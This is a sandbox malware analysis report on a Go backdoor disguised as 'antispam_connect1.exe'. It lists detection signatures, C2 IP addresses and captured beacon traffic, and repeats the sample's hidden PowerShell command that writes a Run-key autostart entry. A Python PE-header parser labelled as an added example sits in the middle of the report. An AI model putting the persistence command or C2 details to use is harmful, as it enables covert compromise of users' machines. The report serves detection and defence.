
Windows Analysis Report
antispam_connect1.exe

Overview

General Information

Sample name: antispam_connect1.exe
Analysis ID: 1533403
MD5: 970c918fdde70fd4e57c0db74cb54be0
SHA1: b1296b7f95cab45b215704de26c8c8bd91cc83b5
SHA256: 18cf24c3c90042ffdb9a96d415ad87d78dea4b47cef22e0ba52380de8225b8f0
Tags: exe, user-Racco42

Detection

GO Backdoor
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found Tor onion address
Machine Learning detection for sample
Suspicious powershell command line found
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • antispam_connect1.exe (PID: 5024 cmdline: "C:\Users\user\Desktop\antispam_connect1.exe" MD5: 970C918FDDE70FD4E57C0DB74CB54BE0)
    • powershell.exe (PID: 5420 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • antispam_connect1.exe (PID: 1600 cmdline: "C:\Users\user\Desktop\antispam_connect1.exe" MD5: 970C918FDDE70FD4E57C0DB74CB54BE0)
    • powershell.exe (PID: 5364 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • antispam_connect1.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\antispam_connect1.exe" MD5: 970C918FDDE70FD4E57C0DB74CB54BE0)
    • powershell.exe (PID: 6552 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: antispam_connect1.exe PID: 5024 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security
Process Memory Space: antispam_connect1.exe PID: 1600 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security
Process Memory Space: antispam_connect1.exe PID: 1900 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\Desktop\antispam_connect1.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5420, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\antispam_connect1.exe", ParentImage: C:\Users\user\Desktop\antispam_connect1.exe, ParentProcessId: 5024, ParentProcessName: antispam_connect1.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }", ProcessId: 5420, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-14T17:22:22.101463+0200 | 2855536 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 109.172.88.38 | 12658 | TCP
2024-10-14T17:22:51.459438+0200 | 2855537 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 109.172.88.38 | 12658 | TCP
2024-10-14T17:22:51.683092+0200 | 2855538 | 1 | A Network Trojan was detected | 109.172.88.38 | 12658 | 192.168.2.5 | 49705 | TCP
2024-10-14T17:22:22.101286+0200 | 2855539 | 1 | A Network Trojan was detected | 109.172.88.38 | 12658 | 192.168.2.5 | 49705 | TCP

        AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: antispam_connect1.exe | Joe Sandbox ML: detected

        Compliance

Source: C:\Users\user\Desktop\antispam_connect1.exe | Unpacked PE file: 0.2.antispam_connect1.exe.4120000.1.unpack
Source: antispam_connect1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: antispam_connect1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT

        Networking

Source: Network traffic | Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 109.172.88.38:12658 -> 192.168.2.5:49705
Source: Network traffic | Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.5:49705 -> 109.172.88.38:12658
Source: Network traffic | Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.5:49705 -> 109.172.88.38:12658
Source: Network traffic | Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 109.172.88.38:12658 -> 192.168.2.5:49705
Source: global traffic | TCP traffic: 109.172.88.38 ports 1,2,12658,5,6,8
Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 109.172.88.38:12658
Source: Joe Sandbox View | IP Address: 46.8.232.106 46.8.232.106
Source: Joe Sandbox View | IP Address: 93.185.159.253 93.185.159.253
Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown | TCP traffic detected without corresponding DNS query: 109.172.88.38
Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253
Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown | TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Host: 46.8.232.106 | User-Agent: Go-http-client/1.1 | Content-Length: 154 | X-Api-Key: lu4b1kVS | Accept-Encoding: gzip | Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b | Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://188.130.206.243
Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://188.130.206.243http://46.8.232.106
Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://46.8.232.106
Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://46.8.236.61
Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://91.212.166.91
Source: antispam_connect1.exe, 00000000.00000002.3374772415.000000000D044000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://91.212.166.91C:
Source: antispam_connect1.exe, 00000000.00000002.3374772415.000000000D042000.00000004.00001000.00020000.00000000.sdmp, antispam_connect1.exe, 00000000.00000002.3374772415.000000000D044000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://91.212.166.91http://46.8.232.106
Source: antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://93.185.159.253
Source: powershell.exe, 00000002.00000002.2182621146.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2350825775.0000000006577000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2179126154.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2342214016.0000000005511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2417908077.00000000046B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2178335062.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2179126154.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2342214016.0000000005511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2417908077.00000000046B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBeq
Source: powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.2415769151.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.mic
Source: powershell.exe, 00000002.00000002.2182621146.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2350825775.0000000006577000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
        Source: C:\Users\user\Desktop\antispam_connect1.exeCode function: 0_2_036D68A10_2_036D68A1
        Source: C:\Users\user\Desktop\antispam_connect1.exeCode function: 5_2_030B68A15_2_030B68A1
        Source: C:\Users\user\Desktop\antispam_connect1.exeCode function: 8_2_02D868A18_2_02D868A1
        Source: antispam_connect1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: classification engineClassification label: mal84.troj.evad.winEXE@12/8@0/6
        Source: C:\Users\user\Desktop\antispam_connect1.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hhxmqpo.0qh.ps1Jump to behavior
        Source: antispam_connect1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\antispam_connect1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeFile read: C:\Users\user\Desktop\antispam_connect1.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\antispam_connect1.exe "C:\Users\user\Desktop\antispam_connect1.exe"
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\Desktop\antispam_connect1.exe "C:\Users\user\Desktop\antispam_connect1.exe"
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown :: Process created: C:\Users\user\Desktop\antispam_connect1.exe "C:\Users\user\Desktop\antispam_connect1.exe"
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Section loaded (in order): apphelp.dll, avifil32.dll, msvfw32.dll, winmm.dll, msacm32.dll, winmm.dll, winmmbase.dll, winmmbase.dll, cryptbase.dll, powrprof.dll, umpdc.dll, mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Section loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Section loaded (in order): avifil32.dll, msvfw32.dll, msacm32.dll, winmm.dll, winmm.dll, winmmbase.dll, winmmbase.dll, cryptbase.dll, powrprof.dll, umpdc.dll, mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Section loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Section loaded (in order): avifil32.dll, msvfw32.dll, msacm32.dll, winmm.dll, winmm.dll, winmmbase.dll, winmmbase.dll, cryptbase.dll, powrprof.dll, umpdc.dll, mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Section loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: antispam_connect1.exe :: Static file information: file size 6955008 bytes (larger than 1048576)
        Source: antispam_connect1.exe :: Static PE information: raw size of .rdata (0x439000) exceeds the 0x100000 threshold
        Source: antispam_connect1.exe :: Static PE information: raw size of .data (0x254e00) exceeds the 0x100000 threshold
        Source: antispam_connect1.exe :: Static PE information: data directory present: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: antispam_connect1.exe :: Static PE information: data directory present: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: antispam_connect1.exe :: Static PE information: data directory present: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: antispam_connect1.exe :: Static PE information: data directory present: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: antispam_connect1.exe :: Static PE information: data directory present: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: antispam_connect1.exe :: Static PE information: data directory present: IMAGE_DIRECTORY_ENTRY_IAT
        Source: antispam_connect1.exe :: Static PE information: DllCharacteristics flags set: DYNAMIC_BASE, NX_COMPAT
        Source: antispam_connect1.exe :: Static PE information: data directory present: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: antispam_connect1.exe :: Static PE information: data directory IMAGE_DIRECTORY_ENTRY_IMPORT is located in section .rdata
        Source: antispam_connect1.exe :: Static PE information: data directory IMAGE_DIRECTORY_ENTRY_RESOURCE is located in section .rsrc
        Source: antispam_connect1.exe :: Static PE information: data directory IMAGE_DIRECTORY_ENTRY_BASERELOC is located in section .reloc
        Source: antispam_connect1.exe :: Static PE information: data directory IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is located in section .rdata
        Source: antispam_connect1.exe :: Static PE information: data directory IMAGE_DIRECTORY_ENTRY_IAT is located in section .rdata
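The static findings above (raw section sizes over 0x100000, which data directories are populated and which section each one lands in, and the DllCharacteristics flags) can be reproduced from the PE headers alone, without pefile. The following Python is an added example and not part of the Joe Sandbox report or of any tooling it describes. The build_sample_pe() helper fabricates a PE32 header whose .rdata and .data raw sizes are the values listed above but is otherwise invented (the analysed sample is not included here); the 0x100000 threshold is taken from the report's own wording.

```python
import struct
from dataclasses import dataclass

# Threshold behind the report's "raw size of .rdata is bigger than 0x100000" finding.
LARGE_SECTION = 0x100000

DIRECTORY_NAMES = ("EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY",
                   "BASERELOC", "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS",
                   "LOAD_CONFIG", "BOUND_IMPORT", "IAT", "DELAY_IMPORT",
                   "COM_DESCRIPTOR", "RESERVED")
DLL_FLAGS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
             0x0400: "NO_SEH", 0x4000: "GUARD_CF"}


@dataclass
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int

    def contains_rva(self, rva: int) -> bool:
        end = self.virtual_address + max(self.virtual_size, self.raw_size)
        return self.virtual_address <= rva < end


def parse_pe(data: bytes) -> dict:
    """Read the COFF header, optional header and section table with struct only."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:       # PE32: NumberOfRvaAndSizes at +92, directories at +96
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:     # PE32+: 8-byte ImageBase shifts both fields by 16
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    directories = {}
    for i in range(min(ndirs, len(DIRECTORY_NAMES))):
        rva, size = struct.unpack_from("<II", data, dirs_off + 8 * i)
        if rva:                                               # unpopulated entries are zero
            directories[DIRECTORY_NAMES[i]] = (rva, size)
    sections = []
    for i in range(nsections):
        name, vsize, va, rsize = struct.unpack_from("<8sIII", data, opt + opt_size + 40 * i)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"), vsize, va, rsize))
    return {"dll_characteristics": dll_chars, "directories": directories, "sections": sections}


def large_sections(pe: dict) -> list:
    """Sections whose on-disk size crosses the report's threshold."""
    return [(s.name, s.raw_size) for s in pe["sections"] if s.raw_size > LARGE_SECTION]


def directory_homes(pe: dict) -> dict:
    """Map each populated data directory to the section containing its RVA (None if none does)."""
    return {name: next((s.name for s in pe["sections"] if s.contains_rva(rva)), None)
            for name, (rva, _) in pe["directories"].items()}


def dll_characteristics(pe: dict) -> list:
    return [n for bit, n in sorted(DLL_FLAGS.items()) if pe["dll_characteristics"] & bit]


def build_sample_pe() -> bytes:
    """Constructed PE32 header image (not the analysed sample). Only headers are emitted,
    since nothing above reads section bodies; .rdata/.data raw sizes copy the report."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100)             # DYNAMIC_BASE | NX_COMPAT
    struct.pack_into("<I", opt, 92, 16)
    struct.pack_into("<II", opt, 96 + 8 * 1, 0x301100, 0x200)    # IMPORT inside .rdata
    struct.pack_into("<II", opt, 96 + 8 * 2, 0xA00000, 0x10)     # RESOURCE outside every section
    struct.pack_into("<II", opt, 96 + 8 * 12, 0x302000, 0x100)   # IAT inside .rdata

    def sect(name, va, vsize, rsize):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, rsize, 0x400, 0, 0, 0, 0, 0x60000020)

    table = (sect(b".text", 0x1000, 0x300000, 0x300000)
             + sect(b".rdata", 0x301000, 0x439000, 0x439000)
             + sect(b".data", 0x73A000, 0x280000, 0x254E00))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


if __name__ == "__main__":
    pe = parse_pe(build_sample_pe())
    print("large sections:", large_sections(pe))
    print("directory homes:", directory_homes(pe))
    print("DllCharacteristics:", dll_characteristics(pe))
```

A statically linked runtime routinely produces multi-megabyte read-only data sections, so the size finding on its own is a hint about the toolchain rather than evidence of obfuscation; the directory-to-section mapping is the more useful check, because a data directory whose RVA falls outside every section (the constructed RESOURCE entry here) points at a header that was rewritten or at a payload the loader will map from somewhere other than the file.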

        Data Obfuscation

        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Unpacked PE file: 0.2.antispam_connect1.exe.4120000.1.unpack
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
